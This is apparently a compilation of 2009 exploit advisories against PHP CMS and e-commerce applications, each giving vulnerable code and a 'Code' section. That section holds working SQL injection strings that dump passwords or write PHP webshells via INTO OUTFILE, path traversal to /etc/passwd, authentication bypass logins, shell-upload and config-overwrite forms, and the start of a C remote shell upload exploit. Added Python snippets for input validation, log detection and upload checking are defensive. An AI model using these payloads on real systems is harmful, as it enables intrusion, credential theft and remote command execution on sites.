LightOpenCMS 0.1 pre-alpha Remote SQL Injection
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] Remote SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php

This bug allows a guest to inject arbitrary SQL statements: the GET parameter id is concatenated into the query without any escaping.

...
if (isset($_GET['id'])) {
    $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
    return mysql_fetch_assoc($result);
...

***********************************************

[+] Code

- [A] Remote SQL Injection

http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23

***********************************************

[+] Fix

No fix.

***********************************************

--
Salvatore Fresta aka drosophila
Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: Pragyan CMS
[+] Version: 2.6.4
[+] Website: http://www.pragyan.org
[+] Bugs: [A] Multiple SQL Injection
[+] Exploitation: Remote
[+] Date: 22 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] Multiple SQL Injection

[-] Risk: high
[-] Requisites: magic_quotes_gpc = off/on

This web application is vulnerable to SQL injection throughout, because no user-supplied variable is sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

***********************************************

[+] Code

- [A] Multiple SQL Injection

http://www.site.com/path/?action=viewfileget=-1' UNION ALL SELECT 'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23

***********************************************

[+] Fix

You must sanitise all user input.

***********************************************

--
Salvatore "drosophila" Fresta
Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: Multi-lingual E-Commerce System
[+] Version: 0.2
[+] Website: http://sourceforge.net/projects/mlecsphp/
[+] Bugs: [A] Local File Inclusion
          [B] Information Disclosure
          [C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 19 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] Local File Inclusion

[-] Risk: high
[-] File affected: index.php

This bug allows a guest to include local files. Both the page and the lang parameters reach include() unfiltered, so either one can carry a traversal sequence. The following is the vulnerable code:

...
if (isset($_GET['lang'])) {
    $_SESSION['lang'] = $_GET['lang'];
}
...
<? include($include_path.'/inc/'.$_GET['page'].'-'.$_SESSION['lang'].'.php'); ?>
...

- [B] Information Disclosure

[-] Risk: medium
[-] File affected: database.inc

This file contains sensitive information such as the username and password used to connect to the database. Because it has only the .inc extension, the web server returns its contents as plain text.

- [C] Arbitrary File Upload

[-] Risk: medium
[-] File affected: product_image.php

None of the files in the admin directory check whether the user has admin privileges, so a guest can execute them. product_image.php contains a form that uploads files to the system but does not check the file extension, so a user can upload arbitrary files.

***********************************************

[+] Code

- [A] Local File Inclusion

http://www.site.com/path/index.php?page=../../../../../etc/passwd %00
http://www.site.com/path/index.php?lang=/../../../../../../etc/passwd %00

- [B] Information Disclosure

http://www.site.com/path/admin/inc/database.inc

- [C] Arbitrary File Upload

html
head
titleMulti-lingual E-Commerce System 0.2 Arbitrary File Upload Exploit/title
/head
body
form enctype=multipart/form-data action=http://site/path/admin/product_image.php; method=POST
label for=productValid product ID:/labelbr
input type=text name=product value=1br
label for=file_nameEvil file name:/labelbr
input type=text name=file_name value=/shell.phpbr
label for=userfileFile:/label
input name=userfile type=file
input type=hidden name=file_pathbrbr
input type=submit value=Upload
/form
/body
/html

***********************************************

[+] Fix

No fix.

***********************************************

--
Salvatore "drosophila" Fresta
Creasito e-commerce content manager Authentication Bypass
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: creasito e-commerce content manager
[+] Version: 1.3.16
[+] Website: http://creasito.bloghosteria.com
[+] Bugs: [A] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 20 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

This CMS is entirely vulnerable to SQL injection. I decided to post the authentication bypass security flaw only.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin/checkuser.php, checkuser.php

An SQL injection bug allows a guest to bypass the authentication system. The following is the vulnerable code:

...
$username = $_POST['username'];
...
$sql = mysql_query("SELECT * FROM amministratore WHERE username='$username' AND password='$password' AND activated='1'");
...

***********************************************

[+] Code

- [A] Authentication Bypass

Username: -1' OR '1'='1'#
Password: foo

***********************************************

[+] Fix

No fix.

***********************************************

--
Salvatore "drosophila" Fresta
Tiny Blogr 1.0.0 rc4 Authentication Bypass
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: Tiny Blogr
[+] Version: 1.0.0 rc4
[+] Website: http://tinyblogr.sourceforge.net
[+] Bugs: [A] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 17 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: class.eport.php

This bug allows a guest to bypass the authentication system.

***********************************************

[+] Code

- [A] Authentication Bypass

Username: admin'#
Password: foo

***********************************************

[+] Fix

No fix.

***********************************************

--
Salvatore "drosophila" Fresta
Malleo 1.2.3 Local File Inclusion Vulnerability
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: Malleo
[+] Version: 1.2.3
[+] Website: http://www.malleo-cms.com
[+] Bugs: [A] Local File Inclusion
[+] Exploitation: Remote
[+] Date: 17 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] Local File Inclusion

[-] Risk: low
[-] File affected: admin.php

This bug allows a privileged user to include local files. I decided to publish this bug for reporting the security flaw only. The module parameter is appended to $root and passed to include_once() after nothing more than a file_exists() check. The following is the vulnerable code:

...
$module = (isset($_GET['module'])) ? $_GET['module'] : $cf->config['default_module_admin'];
...
} else {
    // Update the activity timestamp of the founder session
    if ($cf->config['activer_digicode']) $_SESSION['digicode_TTL'] = time();
    if (file_exists($root.$module)) {
        include_once($root.$module);
...

***********************************************

[+] Code

- [A] Local File Inclusion

http://www.site.com/path/admin.php?module=../../../../../etc/passwd

***********************************************

[+] Fix

No fix.

***********************************************

--
Salvatore "drosophila" Fresta
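The two inclusion bugs above (MLECS's page and lang parameters, Malleo's module parameter) share one root cause: a request value is concatenated onto a directory and handed to include(). The following is an added example, not code from either project, showing the check that prevents it; it is written in Python, and the directory names and allowlists are hypothetical.

```python
import os
import re
from typing import Optional

# Hypothetical base directories standing in for MLECS's $include_path.'/inc/'
# and Malleo's $root; the original code concatenates user input onto them.
INC_DIR = "/var/www/app/inc"
ADMIN_ROOT = "/var/www/app/admin"

# A page, language or module name is one path component: letters, digits and
# underscore only. No '/', no '.', no NUL, so '../' and '%00' never get through.
SAFE_TOKEN = re.compile(r"[A-Za-z0-9_]{1,32}")

# Allowlists of what the application actually ships (assumed names).
KNOWN_PAGES = {"home", "catalog", "product"}
KNOWN_LANGS = {"en", "it", "de"}
KNOWN_MODULES = {"users", "settings"}


def _inside(base: str, candidate: str) -> bool:
    """True if the normalised candidate path lies under base (defence in depth)."""
    return os.path.commonpath([base, candidate]) == base


def resolve_include(page: str, lang: str) -> Optional[str]:
    """MLECS-style include: <INC_DIR>/<page>-<lang>.php, or None when rejected."""
    if not (SAFE_TOKEN.fullmatch(page) and SAFE_TOKEN.fullmatch(lang)):
        return None                      # syntactic check: rejects traversal and NUL
    if page not in KNOWN_PAGES or lang not in KNOWN_LANGS:
        return None                      # semantic check: only values we ship
    candidate = os.path.normpath(os.path.join(INC_DIR, f"{page}-{lang}.php"))
    return candidate if _inside(INC_DIR, candidate) else None


def resolve_module(module: str) -> Optional[str]:
    """Malleo-style admin module: the name selects a file under ADMIN_ROOT instead
    of being appended to $root and handed to file_exists()/include_once()."""
    if not SAFE_TOKEN.fullmatch(module) or module not in KNOWN_MODULES:
        return None
    candidate = os.path.normpath(os.path.join(ADMIN_ROOT, f"{module}.php"))
    return candidate if _inside(ADMIN_ROOT, candidate) else None


if __name__ == "__main__":
    # The advisories' inputs, decoded (%00 is a NUL byte), against the checks.
    print(resolve_include("home", "en"))
    print(resolve_include("../../../../../etc/passwd\x00", "en"))
    print(resolve_include("home", "/../../../../../../etc/passwd\x00"))
    print(resolve_module("../../../../../etc/passwd"))
```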
PHP-agenda <= 2.2.5 Remote File Overwriting
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: PHP-agenda
[+] Version: <= 2.2.5
[+] Website: http://php-agenda.sourceforge.net
[+] Bugs: [A] Remote File Overwriting
[+] Exploitation: Remote
[+] Date: 10 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] Remote File Overwriting

[-] Risk: high
[-] File affected: install.php

This bug allows a guest to overwrite config.inc.php and insert PHP code into it: install.php remains usable after installation and writes the submitted database host into config.inc.php without escaping.

***********************************************

[+] Code

- [A] Remote File Overwriting

html
headPHP-agenda = 2.2.5 - Remote File Overwriting/head
body
form action=http://www.site.com/path/install.php; method=post
input type=text name=dbhost size=30 value='; system($_GET['cmd']); echo '
input type=submit value=Exploit!
/form
/body
/head

To execute commands:

http://www.site.com/path/config.inc.php?cmd=uname -a

***********************************************

[+] Fix

You must delete install.php after installation.

***********************************************

--
Salvatore "drosophila" Fresta
Loggix Project 9.4.5 Blind SQL Injection
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: Loggix Project
[+] Version: 9.4.5
[+] Website: http://loggix.gotdns.org
[+] Bugs: [A] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 10 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: modules/comment/post.php

This bug allows a guest to execute arbitrary queries.

***********************************************

[+] Code

- [A] Blind SQL Injection

POST /path/modules/comment/post.php HTTP/1.1\r\n
Host: site\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 177\r\n
\r\n
title=titlecomment=commentuser_name=useruser_pass=passwordparent_key=keyrefer_id=-1' UNION ALL SELECT '?php system($_GET['cmd']); ?' INTO OUTFILE '/var/www/htdocs/rce.php

***********************************************

[+] Fix

No fix.

***********************************************

--
Salvatore "drosophila" Fresta
Dynamic Flash Forum 1.0 Beta Multiple Remote Vulnerabilities
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: Dynamic Flash Forum
[+] Version: 1.0 Beta
[+] Website: http://df2.sourceforge.net/
[+] Bugs: [A] Information Disclosure
          [B] Authentication Bypass
          [C] Multiple SQL Injection
[+] Exploitation: Remote
[+] Date: 09 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] Information Disclosure

[-] File affected: config.inc

This file contains sensitive information such as the username and password used to connect to the database. Because it has only the .inc extension, the web server returns its contents as plain text.

- [B] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php

This bug allows a guest to bypass the authentication system and log in with administrator privileges.

- [C] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewprofile.php, viewmessage.php, viewthreads.php

This bug allows a guest to execute arbitrary queries.

***********************************************

[+] Code

- [A] Information Disclosure

http://www.site.com/path/config.inc

- [B] Authentication Bypass

Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23
Password: password

- [C] Multiple SQL Injection

http://www.site.com/path/viewprofile.php?userID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23

http://www.site.com/path/viewmessage.php?threadID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL FROM users%23

http://www.site.com/path/viewthreads.php?boardID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)) FROM users%23

***********************************************

[+] Fix

No fix.

***********************************************

--
Salvatore "drosophila" Fresta
AdaptBB 1.0 Beta Multiple Remote Vulnerabilities
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/
[+] Bugs: [A] Multiple Blind SQL Injection
          [B] Multiple Dynamic Code Execution
          [C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 09 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: almost all files are vulnerable

This bug allows a guest to execute arbitrary SQL queries.

- [B] Multiple Dynamic Code Execution

[-] Risk: high
[-] File affected: almost all files are vulnerable

This bug allows a guest to execute arbitrary PHP code: the GET parameter box is substituted into a template that is then passed to eval(), so any PHP code it contains is executed.

...
if ($_GET['box']) {
    $folder = $_GET['box'];
}
...
$ddata[] = ucwords($folder);
...
eval("?>" . str_replace($cdata, $ddata, stripslashes(template($view."_header"))) . "<?php");
...

- [C] Arbitrary File Upload

[-] Risk: high
[-] File affected: attach.php

This bug allows a registered user to upload arbitrary files and execute them from the inc/attachments directory. This is possible because the file extension is checked only on the client side, not on the server side.

***********************************************

[+] Code

- [A] Multiple Blind SQL Injection

http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=profileuser=blablabox=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=messagesuser=blablabox=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=edit_postid=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8,9 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23

To execute commands:

http://site/path/rce.php?cmd=uname -a

- [B] Multiple Dynamic Code Execution

http://www.site.com/path/index.php?do=profileuser=blablabox=?php echo pre; system('ls'); echo /pre?

http://www.site.com/path/index.php?do=messagesuser=blablabox=?php echo pre; system('ls'); echo /pre?

***********************************************

[+] Fix

To fix these bugs you must validate the input properly. It is also not recommended to store the real username and password in cookies.

***********************************************

--
Salvatore "drosophila" Fresta
Joomla Component com_bookjoomlas SQL Injection Vulnerability
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: Joomla Component com_bookjoomlas
[+] Version: 0.1
[+] Website: http://www.alikonweb.it
[+] Bugs: [A] SQL Injection
[+] Exploitation: Remote
[+] Dork: inurl:index.php?option=com_bookjoomlas
[+] Date: 06 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] SQL Injection

[-] Security risk: low
[-] File affected: sub_commententry.php

This bug allows a privileged user to view the username and password of a registered user. Like every injectable SELECT query, it can also be manipulated to write files on the system.

***********************************************

[+] Code

- [A] SQL Injection

http://www.site.com/path/index.php?option=com_bookjoomlasItemid=26func=commentgbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users

***********************************************

[+] Fix

No fix.

***********************************************

--
Salvatore "drosophila" Fresta
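Most of the payloads in these advisories travel in a GET request line, so they land in the web server's access log. The following is an added example, not part of any advisory, that scans constructed combined-format log lines for the request shapes seen on this page: UNION/INTO OUTFILE/LOAD_FILE injection, ../ traversal with a %00 terminator, PHP tags in a query string, and direct requests for .inc files and for a leftover install.php. The log lines and the IP address are constructed.

```python
import re
from urllib.parse import unquote

# Detection rules derived from the payload shapes in the advisories above.
RULES = [
    ("sqli-union",        re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("sqli-outfile",      re.compile(r"\bINTO\s+OUTFILE\b", re.I)),
    ("sqli-load_file",    re.compile(r"\bLOAD_FILE\s*\(", re.I)),
    ("sqli-comment",      re.compile(r"'\s*(#|--)")),      # quote then SQL comment
    ("lfi-traversal",     re.compile(r"(\.\./){2,}")),
    ("lfi-nullbyte",      re.compile("\x00")),             # %00 after decoding
    ("php-tag-in-query",  re.compile(r"<\?php|\?>", re.I)),
    ("inc-file-request",  re.compile(r"\.inc(\?|$)", re.I)),
    ("installer-request", re.compile(r"/install\.php(\?|$)", re.I)),
]

# Apache/nginx "combined" format; only the request target is inspected.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed log lines carrying the advisories' request shapes (' is %27).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jun/2009:10:00:01 +0000] "GET /path/index.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,LOAD_FILE(%27/etc/passwd%27),4%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Jun/2009:10:00:02 +0000] "GET /path/?action=viewfile&get=-1%27%20UNION%20ALL%20SELECT%20%27evil_code%27,2,3,4,5,6,7%20INTO%20OUTFILE%20%27/path/evil.php%27%23 HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Jun/2009:10:00:03 +0000] "GET /path/index.php?page=../../../../../etc/passwd%00 HTTP/1.1" 200 1873 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Jun/2009:10:00:04 +0000] "GET /path/admin/inc/database.inc HTTP/1.1" 200 244 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Jun/2009:10:00:05 +0000] "GET /path/index.php?do=profile&user=x&box=%3C%3Fphp%20system(%27ls%27)%3B%20%3F%3E HTTP/1.1" 200 902 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Jun/2009:10:00:06 +0000] "POST /path/install.php HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Jun/2009:10:00:07 +0000] "GET /path/index.php?id=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]


def classify(target: str) -> list:
    """Return the names of the rules triggered by one request target (path + query)."""
    decoded = unquote(unquote(target))   # second pass catches double-encoding
    return [name for name, rx in RULES if rx.search(decoded)]


def scan(lines) -> list:
    """Return (ip, target, [rule names]) for every line that triggers a rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue                      # not in the expected format; skip
        rules = classify(m["target"])
        if rules:
            hits.append((m["ip"], m["target"], rules))
    return hits


if __name__ == "__main__":
    for ip, target, rules in scan(SAMPLE_LOG):
        print(ip, ",".join(rules), target[:60])
```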
Family Connections 1.8.2 Arbitrary File Upload
***********************************************
Salvatore "drosophila" Fresta
***********************************************

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 3 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

***********************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***********************************************

[+] Bugs

- [A] Arbitrary File Upload

[-] Files affected: documents.php, inc/documents_class.php

This bug allows a registered user to upload arbitrary files to the system. This is possible because the file extension is never checked; the only check is on the Content-Type header, which the client sets and can change freely.

...
if (isset($_POST['submitadd'])) {
    $doc = $_FILES['doc']['name'];
    $desc = addslashes($_POST['desc']);
    if ($docs->uploadDocument($_FILES['doc']['type'], $_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) {
...

function uploadDocument ($filetype, $filename, $filetmpname) {
    global $LANG;
    $known_photo_types = array(
        'application/msword' => 'doc',
        'text/plain' => 'txt',
        'application/excel' => 'xsl',
        'application/vnd.ms-excel' => 'xsl',
        'application/x-msexcel' => 'xsl',
        'application/x-compressed' => 'zip',
        'application/x-zip-compressed' => 'zip',
        'application/zip' => 'zip',
        'multipart/x-zip' => 'zip',
        'application/rtf' => 'rtf',
        'application/x-rtf' => 'rtf',
        'text/richtext' => 'rtf',
        'application/mspowerpoint' => 'ppt',
        'application/powerpoint' => 'ppt',
        'application/vnd.ms-powerpoint' => 'ppt',
        'application/x-mspowerpoint' => 'ppt',
        'application/x-excel' => 'xsl',
        'application/pdf' => 'pdf');
    if (!array_key_exists($filetype, $known_photo_types)) {
        echo "<p class=\"error-alert\">".$LANG['err_not_doc1']. $filetype .$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
        return false;
    } else {
        copy($filetmpname, "gallery/documents/$filename");
        return true;
    }
}
...

***********************************************

[+] Code

- [A] Arbitrary File Upload

The following is an example of a malicious request:

POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
--AaB03x\r\n
Content-Disposition: form-data; name=doc; filename=file.php\r\n
Content-Type: text/plain\r\n
\r\n
?php echo This is not a text file?\r\n
--AaB03x\r\n
Content-Disposition: form-data; name=desc\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data; name=submitadd\r\n
\r\n
Submit\r\n
--AaB03x--\r\n

***********************************************

[+] Fix

No fix.

***********************************************

--
Salvatore "drosophila" Fresta
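The three upload bugs on this page (MLECS product_image.php, AdaptBB attach.php and Family Connections uploadDocument()) accept or reject a file on something the client controls: nothing, a client-side check, or the Content-Type header. The following is an added example, not code from any of these projects, that parses a multipart body of the same shape as the request above and compares the Content-Type-only check with a check on the filename and the file's leading bytes. The body, the allowlists and the field names are constructed for the example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Vulnerable check, as in uploadDocument(): only the client-supplied
# Content-Type is consulted (subset of the page's map; spelling kept as-is).
KNOWN_DOC_TYPES = {"application/msword": "doc", "text/plain": "txt",
                   "application/vnd.ms-excel": "xsl", "application/zip": "zip",
                   "application/rtf": "rtf", "application/pdf": "pdf"}


def vulnerable_accepts(content_type: str) -> bool:
    return content_type in KNOWN_DOC_TYPES     # filename and bytes never looked at


# Hardened check: decide by the extension the web server will act on, allow
# exactly one extension, and confirm binary formats by their leading bytes.
ALLOWED_EXT = {"txt", "doc", "xls", "ppt", "zip", "rtf", "pdf"}
OLE2 = b"\xd0\xcf\x11\xe0"                      # legacy Office container
MAGIC = {"pdf": b"%PDF", "zip": b"PK\x03\x04", "rtf": b"{\\rtf",
         "doc": OLE2, "xls": OLE2, "ppt": OLE2}
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def hardened_accepts(filename: str, data: bytes) -> Tuple[bool, str]:
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path part
    m = SAFE_NAME.fullmatch(name)
    if not m:
        return False, "filename must be name.ext with a single extension"
    ext = m.group(1).lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension .{ext} not allowed"
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        return False, f"content does not look like .{ext}"
    if ext == "txt" and b"<?" in data:
        return False, "text upload contains a PHP open tag"
    return True, ext


def parse_multipart(body: bytes, boundary: str) -> List[Tuple[Dict[str, str], bytes]]:
    """Minimal multipart/form-data splitter: (headers, data) for each part."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):              # closing delimiter
            break
        head, _, data = chunk[2:].partition(b"\r\n\r\n")   # chunk opens with CRLF
        headers = {}
        for line in head.split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            headers[key.strip().lower()] = value.strip()
        parts.append((headers, data[:-2] if data.endswith(b"\r\n") else data))
    return parts


def file_part(parts, field: str = "doc") -> Optional[Tuple[str, str, bytes]]:
    """Return (filename, content-type, data) of the named file field."""
    for headers, data in parts:
        disp = headers.get("content-disposition", "")
        if f'name="{field}"' in disp:
            fn = re.search(r'filename="([^"]*)"', disp)
            return (fn.group(1) if fn else ""), headers.get("content-type", ""), data
    return None


# Constructed body with the same structure as the advisory's request.
BOUNDARY = "AaB03x"
SAMPLE_BODY = (
    b"--AaB03x\r\n"
    b'Content-Disposition: form-data; name="doc"; filename="file.php"\r\n'
    b"Content-Type: text/plain\r\n\r\n"
    b"<?php echo 'This is not a text file'; ?>\r\n"
    b"--AaB03x\r\n"
    b'Content-Disposition: form-data; name="desc"\r\n\r\n'
    b"description\r\n"
    b"--AaB03x\r\n"
    b'Content-Disposition: form-data; name="submitadd"\r\n\r\n'
    b"Submit\r\n"
    b"--AaB03x--\r\n"
)


def check_upload(body: bytes, boundary: str) -> Tuple[bool, Tuple[bool, str]]:
    """Run both checks on the 'doc' field: (vulnerable verdict, hardened verdict)."""
    filename, ctype, data = file_part(parse_multipart(body, boundary))
    return vulnerable_accepts(ctype), hardened_accepts(filename, data)


if __name__ == "__main__":
    print(check_upload(SAMPLE_BODY, BOUNDARY))   # (True, (False, '...'))
```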
Family Connections <= 1.8.2 - Remote Shell Upload Exploit
/*
 Family Connections <= 1.8.2 - Remote Shell Upload Exploit

 Author: Salvatore "drosophila" Fresta
 Contact: drosophila...@gmail.com
 Date: 3 April 2009

 The following software will upload a simple php shell.
 To execute remote commands, you must open the file using a browser.

 gcc rsue.c -o rsue
 ./rsue localhost /fcms/ user password

 [*] Connecting...
 [+] Connected
 [*] Send login...
 [+] Login Successful
 [+] Uploading...
 [+] Shell uploaded
 [+] Connection closed

 Open your browser and go to http://localhost/fcms/gallery/documents/shell.php?cmd=[commands]
*/

#include string.h
#include stdlib.h
#include stdio.h
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include unistd.h
#include netdb.h

int socket_connect(char *server, int port) {
    int fd;
    struct sockaddr_in sock;
    struct hostent *host;
    memset(sock, 0, sizeof(sock));
    if((fd = socket(AF_INET, SOCK_STREAM, 0)) 0) return -1;
    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);
    if(!(host=gethostbyname(server))) return -1;
    sock.sin_addr = *((struct in_addr *)host-h_addr);
    if(connect(fd, (struct sockaddr *) sock, sizeof(sock)) 0) return -1;
    return fd;
}

int socket_send(int socket, char *buffer, size_t size) {
    if(socket 0) return -1;
    return write(socket, buffer, size) 0 ? -1 : 0;
}

char *socket_receive(int socket, int tout) {
    fd_set input;
    int ret, byte;
    char *buffer, *tmp;
    struct timeval timeout;
    FD_ZERO(input);
    FD_SET(socket, input);
    if(tout 0) { timeout.tv_sec = tout; timeout.tv_usec = 0; }
    if(socket 0) return NULL;
    if(!(buffer = (char *) calloc (0, sizeof (char return NULL;
    while (1) {
        if(tout 0) ret = select(socket + 1, input, NULL, NULL, timeout);
        else ret = select(socket + 1, input, NULL, NULL, NULL);
        if (!ret) break;
        if (ret 0) return NULL;
        if(!(tmp = (char *) calloc (1024, sizeof (char return NULL;
        if ((byte=read(socket, tmp, 1024)) 0) return NULL;
        if(!byte) break;
        if(!(buffer = (char *) realloc(buffer, strlen (buffer) + strlen (tmp return NULL;
        strncat(buffer, tmp, strlen(buffer)+strlen(tmp));
    }
    return buffer;
}

void usage(char *bn) {
